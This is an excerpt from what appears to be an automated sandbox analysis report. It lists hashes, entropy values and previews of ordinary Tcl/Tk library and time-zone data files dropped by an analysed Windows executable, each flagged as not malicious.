                                                                                                                                                                                                                              SHA1:7813B54BF2BD0C40A39CA9A29CC50C6D034880A3
                                                                                                                                                                                                                              SHA-256:CED56F09D68BE00555219594C7B2F3E7EFE8323201FB3E2AA0E1FA9A6467D5AF
                                                                                                                                                                                                                              SHA-512:AC822061F5C9743120A66E11C02B199253A40460A87F78DC154B0BDD91E410EDDA581E889F5D2A74670939034F39A7F6C7E814E038A1371DAB71EF79A8911AE7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Anchorage)]} {.. LoadTimeZoneFile America/Anchorage..}..set TZData(:US/Alaska) $TZData(:America/Anchorage)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):176
                                                                                                                                                                                                                              Entropy (8bit):4.8886795125313585
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0/yO5WXHAIg20/yOoNvWARL/iObMEIB/4IAcGE/y2:SlSWB9vsM3y7/yrHAIgp/yH0AN/itE8h
                                                                                                                                                                                                                              MD5:AB14CF1840CBDA2B326660DBD51273B4
                                                                                                                                                                                                                              SHA1:78144B3A2C75568307E4E86AE3B01EA7F541B011
                                                                                                                                                                                                                              SHA-256:A4F1398CF84D0AE09BF19288770756622D1710CCBFBFE79E0D3239497731287D
                                                                                                                                                                                                                              SHA-512:557A3ED9D1401E76291DC41524A1FD04AFF0829CEF66E103CEF9D10CD751F04FDEB6B7C0490302C71297F53AA8DC42930649AD274215D5DF068BCDE837E73756
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Adak)]} {.. LoadTimeZoneFile America/Adak..}..set TZData(:US/Aleutian) $TZData(:America/Adak)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.9334626069754455
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0utLaDovXHAIg20utLRYovHRL/iQMfQfBx+IAcGEB:SlSWB9vsM3y7OBHAIgpONYyHN/iZfQfl
                                                                                                                                                                                                                              MD5:30ED80335BE37C7CBA672C33FDE23490
                                                                                                                                                                                                                              SHA1:B627E86F023FE02A5590FE8D55FF41946BE6D24B
                                                                                                                                                                                                                              SHA-256:9503403F231BA33415A5F2F0FDD3771CE7FF78534CE83C16A8DB5BC333B4AD8A
                                                                                                                                                                                                                              SHA-512:C1352612EC0B4FF2F6F279CDB6008D7E9DA7F94F0009EFD959AD3092393150ECA83A09E72C724E1A4BFC3A057B9218D54A87FFA1102E2D9BF058B78AC0A0B1AB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Phoenix)]} {.. LoadTimeZoneFile America/Phoenix..}..set TZData(:US/Arizona) $TZData(:America/Phoenix)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.90255068822036
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx096yXHAIg20961yHRL/ibXgox/h4IAcGE967:SlSWB9vsM3y796SHAIgp9616N/iB490+
                                                                                                                                                                                                                              MD5:7770A6B85B2FE73BCCE9D803E0200F23
                                                                                                                                                                                                                              SHA1:784AD1082FF1569961C2AC44F6D6F7605FBBE766
                                                                                                                                                                                                                              SHA-256:B6AC9FAE0AB69D58ECFD6B9A84F3C6D3E1A594E40CEEC94E2A0A7855781E173A
                                                                                                                                                                                                                              SHA-512:EEE79D37D77E6B80B91E8F30CE48B107371F6A58F0C91785E3C74EF210AE1011D0EB913113F1873BE6099B0BE1260410F0C74650446CB377F8FDB5505A44F266
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Chicago)]} {.. LoadTimeZoneFile America/Chicago..}..set TZData(:US/Central) $TZData(:America/Chicago)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):228
                                                                                                                                                                                                                              Entropy (8bit):4.7645631776966715
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y73GK7JHAIgp3GKZRN/i3E0903GK8:MByMY3GK7Kp3GKnti3t903GK8
                                                                                                                                                                                                                              MD5:96828B6BA17CA96723794F4B3744B494
                                                                                                                                                                                                                              SHA1:C3A824A925AEFE2A13A0E65548078D9842C2C7D7
                                                                                                                                                                                                                              SHA-256:5D86F8D36598516FB2342A18A87DB2701BABD265B0671CC9321C48DB22C7ECA5
                                                                                                                                                                                                                              SHA-512:2A27A455787DEAC3EC78A2784FB989DAB178E9D6DD7721CD3F5D3337231A3C651994B964D6CE040B7858E0127D7F70C0C48CB0D553D5B725B649C828288224B5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Indianapolis)]} {.. LoadTimeZoneFile America/Indiana/Indianapolis..}..set TZData(:US/East-Indiana) $TZData(:America/Indiana/Indianapolis)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):5.0345860115708785
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0wAy0vfXHAIg20wAyGWARL/i37oxp4IAcGEwAy0yn:SlSWB9vsM3y71RHAIgp1aAN/i37oxp4P
                                                                                                                                                                                                                              MD5:375DB249106C5D351CA0E84848835EDB
                                                                                                                                                                                                                              SHA1:ECC5C0C9DA68773B94C9013F4F1A8800D511CC4C
                                                                                                                                                                                                                              SHA-256:2FFCAD8CBEF5ECDC74DB3EE773E4B18ABC8EFA9C09C4EA8F3A45A08BADAF91A9
                                                                                                                                                                                                                              SHA-512:21550743BF4E1A79754F76AB201F0EB6BA6B265F43855901640054316A4A32A5D01D266B2441E4A6415720715A2ABD367D82E3D40949A7A66BE9F8366E47A8DD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/New_York)]} {.. LoadTimeZoneFile America/New_York..}..set TZData(:US/Eastern) $TZData(:America/New_York)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.88075715646936
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG2fWGYFeyXHAIgObT2fWKARL/ioMN75nUDH2fWWv:SlSWB9vsM3yc6e8SHAIgOb6eKAN/ioER
                                                                                                                                                                                                                              MD5:C0475756CFEC302F737967468804846E
                                                                                                                                                                                                                              SHA1:85C13CA0A908C69B8BBB6040FC502AFF96B8F8C7
                                                                                                                                                                                                                              SHA-256:529BB43EFDA6C1584FEAEA789B590CEF1397E33457AB3845F3101B1FC126E0FB
                                                                                                                                                                                                                              SHA-512:D3FF374443344E8438D50803872E8A8EA077B2299B38C1BD155386B4D2C6008BBD0C0B0B26DE9680812D4AFC9A187B644BDCCB04C23880337228BCEC06D5D61B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Honolulu)]} {.. LoadTimeZoneFile Pacific/Honolulu..}..set TZData(:US/Hawaii) $TZData(:Pacific/Honolulu)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):206
                                                                                                                                                                                                                              Entropy (8bit):4.87340978435866
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y73GKaHAIgp3GKIN/iGIfh4903GKT:MByMY3GKDp3GKItiBfh4903GKT
                                                                                                                                                                                                                              MD5:00AAFD60A0B1146274981FAB6336AFD9
                                                                                                                                                                                                                              SHA1:20AD47ED52874202585C90FE362663F060E064D3
                                                                                                                                                                                                                              SHA-256:5827B6A6D50CF0FB75D6BA6E36282591AD25E1F0BE636DCFC5D09BDA29A107FD
                                                                                                                                                                                                                              SHA-512:61113AB72B7D671D7B429106709E73DB57D5B8A382680BA37A54126C7F54BC2D6B47A2584177CE6B434793546DA7EB9B8B7DF9163816DBFC67C83D9930D6A158
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Knox)]} {.. LoadTimeZoneFile America/Indiana/Knox..}..set TZData(:US/Indiana-Starke) $TZData(:America/Indiana/Knox)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.83459089067994
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx06FQGFfXHAIg206FQJARL/iHaMCELMr4IAcGE6FQB:SlSWB9vsM3y74PFPHAIgp4KAN/iHaMHs
                                                                                                                                                                                                                              MD5:D955A5A943B203DC4B87A91ED196B82A
                                                                                                                                                                                                                              SHA1:C7ACC48AB2033C372C60C741F68B12FFAEA147DE
                                                                                                                                                                                                                              SHA-256:B4E4269C4FEBFEFF26750B297A590226C0A6872519A6BFDE36F6DC3F6F756349
                                                                                                                                                                                                                              SHA-512:445DC9A50487A4BA0A7F79078441696DCAA31F9988E5B515B5A827AC9275776B22DE303040900C1726EB99CABA8AD09E57AA674F798EA3FDEBC580E4B87D9439
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Detroit)]} {.. LoadTimeZoneFile America/Detroit..}..set TZData(:US/Michigan) $TZData(:America/Detroit)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.892777905787396
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx06RGFfXHAIg206RORL/iBOlLo/4IAcGE6RB:SlSWB9vsM3y7+SPHAIgp+ON/iBY8/49Z
                                                                                                                                                                                                                              MD5:E53EDD55E6448C624DD03A8A100EF5AF
                                                                                                                                                                                                                              SHA1:1D266553CAFA23A3375CFAF7AFE6636553CC7B70
                                                                                                                                                                                                                              SHA-256:3763BF520D3C97148C34DCFBDF70DEC2636D4E38241555900C058EFEE3BD1256
                                                                                                                                                                                                                              SHA-512:B7FCF01DBB4231F30FEFA77C339B2CD7D984D6E6182F3BD15D6B64AC9525994E7CBF90C3F1F520FD22B54E19831B3CBAE1C22F04F60244C0C60A1809942422A4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Denver)]} {.. LoadTimeZoneFile America/Denver..}..set TZData(:US/Mountain) $TZData(:America/Denver)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):196
                                                                                                                                                                                                                              Entropy (8bit):4.932311644026309
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0ydJg4o3vXHAIg20ydJPyHRL/iP+e2IAcGEydJgov:SlSWB9vsM3y7DvPHAIgp5N/ip290Dy
                                                                                                                                                                                                                              MD5:37AF94FAB52D80AF32C766644892E36D
                                                                                                                                                                                                                              SHA1:03CE96A3B3EBFC16C9ED192DD2127FB265A7ED49
                                                                                                                                                                                                                              SHA-256:54E5F126D4E7CC13555841A61FF66C0350621C089F475638A393930B3FB4918C
                                                                                                                                                                                                                              SHA-512:405A7F414FA0864111E5E9F06FCA675BF4EF11FE0F82F5438416273BEF820A030A50E4D43E4E522ED79C08C0C243E9DD3692971DC912C9ADFB1BEABEB935CDDC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Los_Angeles)]} {.. LoadTimeZoneFile America/Los_Angeles..}..set TZData(:US/Pacific) $TZData(:America/Los_Angeles)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.838968615416201
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGurKeTnXHAIgObTurKefVHRL/i6A5nUDHurKeTyn:SlSWB9vsM3yciemHAIgObiecN/idXevn
                                                                                                                                                                                                                              MD5:509CF35F5F7C9567FD19CC5C137DC070
                                                                                                                                                                                                                              SHA1:AA5F27D36BC617A6A4107E3CA0CB0C10A71A1D9E
                                                                                                                                                                                                                              SHA-256:E51FC51C65FFEAB514D7636271157EE8941BDACF602CBC380F5D60B5FA674E87
                                                                                                                                                                                                                              SHA-512:E23633A16F11015F3FE2F4E675B5A60B4FDC61F8CF152FDB9BA7ED4C213B8897117721A78C5470296DAFB0FD4F0DDC019DD0DB8C28C1F1B2BE0D3A289F53D5B3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Pago_Pago)]} {.. LoadTimeZoneFile Pacific/Pago_Pago..}..set TZData(:US/Samoa) $TZData(:Pacific/Pago_Pago)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):153
                                                                                                                                                                                                                              Entropy (8bit):4.844017562912325
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/iLB5h8RFB:SlSWB9vsM3yzTHAIgm6N/iLfh8RX
                                                                                                                                                                                                                              MD5:3402C8784654C24F7E956731866B833F
                                                                                                                                                                                                                              SHA1:C34F3CCA074A50E6564B8C78683C8763B37A3002
                                                                                                                                                                                                                              SHA-256:DEE28FF84E3FC495ED3547D5E5E9FAFDACC36A67329E747D434248ED45BF1755
                                                                                                                                                                                                                              SHA-512:FBA2840B0FA0F084EE9840BCF56E497F8A7ABF509FA10FA66FB26BA3D80079C4F9A363577A453CD68557080EAF9DD7F1F7B5AF957B64BDA2A897B1E08C85DD19
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:UTC) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):159
                                                                                                                                                                                                                              Entropy (8bit):4.879221007428352
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/iL7DJMFfh8RFB:SlSWB9vsM3yzTHAIgm6N/iL7VMr8RX
                                                                                                                                                                                                                              MD5:5F24A249884C241D1E03D758C2641675
                                                                                                                                                                                                                              SHA1:63AAC15A68659006F8A14FEC3F2A66B55A8AC398
                                                                                                                                                                                                                              SHA-256:B7B0B82F471D64704E1D6F84646E6B7B2BD9CAB793FAD00F9C9B0595143C0AB7
                                                                                                                                                                                                                              SHA-512:A7AB5E26A2C23BA296942D7C524C6EE6708A9A38CDD88022EA92E2180BC3CCFE930758FC20A24A0D271AD70733EB924B0E530FBF83CC0FC49EAD411B28503CC0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Universal) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):172
                                                                                                                                                                                                                              Entropy (8bit):4.999171213761279
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVwTwWXHAIgoqzTbNOARL/gIuyQauTgvn:SlSWB9vsM3ymSHAIgoXAN/gXy5n
                                                                                                                                                                                                                              MD5:5444E85070CA2E7A52D38D6D53216B88
                                                                                                                                                                                                                              SHA1:0F9A4FB1156312EBD0B9C81DA2164E89D21878E1
                                                                                                                                                                                                                              SHA-256:F7DA75B585F45AB501B2889E272FF47B1C4A1D668E40AED7463EB0E8054028C2
                                                                                                                                                                                                                              SHA-512:BBC94F98C84641392D3A4B67C152E92EDB3011DA329319ADB2485DBEAFD44DED328D80FBCA89E58687E1F0EB6BED8580BBB0075CA42284B6206A8641D76F2DE5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Moscow)]} {.. LoadTimeZoneFile Europe/Moscow..}..set TZData(:W-SU) $TZData(:Europe/Moscow)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6945
                                                                                                                                                                                                                              Entropy (8bit):3.7806395604065135
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:v6PgDGfXCiZoFtFPIaFF1w0urfva946ZGsE3f2Sf+aCNmSv+kznl4klEp8OT:rQbkIaFF1w0us4qE3+sSGjT
                                                                                                                                                                                                                              MD5:1EC38B05B53ECF2DD3A90164C4693934
                                                                                                                                                                                                                              SHA1:00900F0ADDB7526C63C67CA1662C038E95A79245
                                                                                                                                                                                                                              SHA-256:7E6E2369C19DD19A41BE27BB8AD8DF5BE8B0096ED045C8B2C2D2F0916D494079
                                                                                                                                                                                                                              SHA-512:47A8DAAB1B891FF09A94AF01B6673213392F70C6C1EE53D95A59D6E238FD06B0E80FA21C7279A9ADA891F5CA5B86E4D6B696EE8CFE14BFEF0ACCC9759AF1419A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:WET) {.. {-9223372036854775808 0 0 WET}.. {228877200 3600 1 WEST}.. {243997200 0 0 WET}.. {260326800 3600 1 WEST}.. {276051600 0 0 WET}.. {291776400 3600 1 WEST}.. {307501200 0 0 WET}.. {323830800 3600 1 WEST}.. {338950800 0 0 WET}.. {354675600 3600 1 WEST}.. {370400400 0 0 WET}.. {386125200 3600 1 WEST}.. {401850000 0 0 WET}.. {417574800 3600 1 WEST}.. {433299600 0 0 WET}.. {449024400 3600 1 WEST}.. {465354000 0 0 WET}.. {481078800 3600 1 WEST}.. {496803600 0 0 WET}.. {512528400 3600 1 WEST}.. {528253200 0 0 WET}.. {543978000 3600 1 WEST}.. {559702800 0 0 WET}.. {575427600 3600 1 WEST}.. {591152400 0 0 WET}.. {606877200 3600 1 WEST}.. {622602000 0 0 WET}.. {638326800 3600 1 WEST}.. {654656400 0 0 WET}.. {670381200 3600 1 WEST}.. {686106000 0 0 WET}.. {701830800 3600 1 WEST}.. {717555600 0 0 WET}.. {733280400 3600 1 WEST}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):154
                                                                                                                                                                                                                              Entropy (8bit):4.8800842076244715
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/taFBURFB:SlSWB9vsM3yzTHAIgm6N/YFaRX
                                                                                                                                                                                                                              MD5:DDB6F69CA4F0EF6A708481F53F95EAB9
                                                                                                                                                                                                                              SHA1:A63E900A9257E9D73B4BB4BACBA8133C3D1DC41B
                                                                                                                                                                                                                              SHA-256:A06E8CCCF97CC8FB545DFDB4C89B5E5C8EDF0360547BDC1823B4AC47B1556C31
                                                                                                                                                                                                                              SHA-512:C8EA1039BE001F5EF52662B28DBF46D02E4848F08F05923850DEA1994732037B4C8D6030B742D97FA4276AF5FEE3F17C47C7DDA4F44DD23244F9976A076D5CC4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Zulu) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5030
                                                                                                                                                                                                                              Entropy (8bit):4.838527643033185
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:HgTQWiZuhdFQJmuldFQofsGP3R1hF9Dl19arB0E9Dl1YoaEhHe2Gu/q1ZFyJRpqk:8iZUroxvR197ABr971h5GIqrmbqIc+b/
                                                                                                                                                                                                                              MD5:70450A0CF04EF273EFF2B070053FCFA6
                                                                                                                                                                                                                              SHA1:47974D6C0FC986EE1273C4E13DDB9E1288CEF0FF
                                                                                                                                                                                                                              SHA-256:678F891615E2209A8ECBA17857922A9723E78709ADB983032E89CA706000C44D
                                                                                                                                                                                                                              SHA-512:AFD3E47324D1497CC46AC6141191FCEB843977D0B0285C807FF8985DCC56FDE10977F57D503D986CD2C1EDC6C62F01E405A0EB483340B247B129FC8D6D9FE689
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# word.tcl --..#..# This file defines various procedures for computing word boundaries in..# strings. This file is primarily needed so Tk text and entry widgets behave..# properly for different platforms...#..# Copyright (c) 1996 Sun Microsystems, Inc...# Copyright (c) 1998 Scritpics Corporation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....# The following variables are used to determine which characters are..# interpreted as white space.....if {$::tcl_platform(platform) eq "windows"} {.. # Windows style - any but a unicode space char.. if {![info exists ::tcl_wordchars]} {...set ::tcl_wordchars {\S}.. }.. if {![info exists ::tcl_nonwordchars]} {...set ::tcl_nonwordchars {\s}.. }..} else {.. # Motif style - any unicode word char (number, letter, or underscore).. if {![info exists ::tcl_wordchars]} {...set ::tcl_wordchars {\w}.. }.. if {![info exists ::tcl_nonwordchar
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8806
                                                                                                                                                                                                                              Entropy (8bit):4.863085192885279
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:RpwYLapGk1BlM4UBIHpJFVUXUziMJ5Kxyk55qxUr7Vdk5vNR:RuYfvMdOXyj+01f
                                                                                                                                                                                                                              MD5:C5E9A2E32AE83A79DF422D1145B692DF
                                                                                                                                                                                                                              SHA1:08350F930FB97A95970122920C91FB9CED8329E9
                                                                                                                                                                                                                              SHA-256:8822365EE279BEBF7A36CFDEDBA1114762F894781F4635170CC5D85FF5B17923
                                                                                                                                                                                                                              SHA-512:71420E15A3D63329560074F6FFAD42CB464401284BC29D0DC8E34D83F8F77079F26BB4C5703E656A48E6931C3DBF6B873756FB212D0860483E0301B29EDE1212
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# bgerror.tcl --..#..#.Implementation of the bgerror procedure. It posts a dialog box with..#.the error message and gives the user a chance to see a more detailed..#.stack trace, and possible do something more interesting with that..#.trace (like save it to a log). This is adapted from work done by..#.Donal K. Fellows...#..# Copyright (c) 1998-2000 by Ajuba Solutions...# Copyright (c) 2007 by ActiveState Software Inc...# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>..# Copyright (c) 2009 Pat Thoyts <patthoyts@users.sourceforge.net>....namespace eval ::tk::dialog::error {.. namespace import -force ::tk::msgcat::*.. namespace export bgerror.. option add *ErrorDialog.function.text [mc "Save To Log"] \...widgetDefault.. option add *ErrorDialog.function.command [namespace code SaveToLog].. option add *ErrorDialog*Label.font TkCaptionFont widgetDefault.. if {[tk windowingsystem] eq "aqua"} {...option add *ErrorDialog*background systemAlertBackgroundActi
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21612
                                                                                                                                                                                                                              Entropy (8bit):4.947590677310969
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:Tv7cBCAsj9oqlFFSsB3VfRt+lMpWaNwJgzCHarc6gAsj9oqlFFSsB3VlRtYlMpBz:TvweHBBTfIZxHBnZWqbJPBFIaVlCj26+
                                                                                                                                                                                                                              MD5:AEB53F7F1506CDFDFE557F54A76060CE
                                                                                                                                                                                                                              SHA1:EBB3666EE444B91A0D335DA19C8333F73B71933B
                                                                                                                                                                                                                              SHA-256:1F5DD8D81B26F16E772E92FD2A22ACCB785004D0ED3447E54F87005D9C6A07A5
                                                                                                                                                                                                                              SHA-512:ACDAD4DF988DF6B2290FC9622E8EACCC31787FECDC98DCCA38519CB762339D4D3FB344AE504B8C7918D6F414F4AD05D15E828DF7F7F68F363BEC54B11C9B7C43
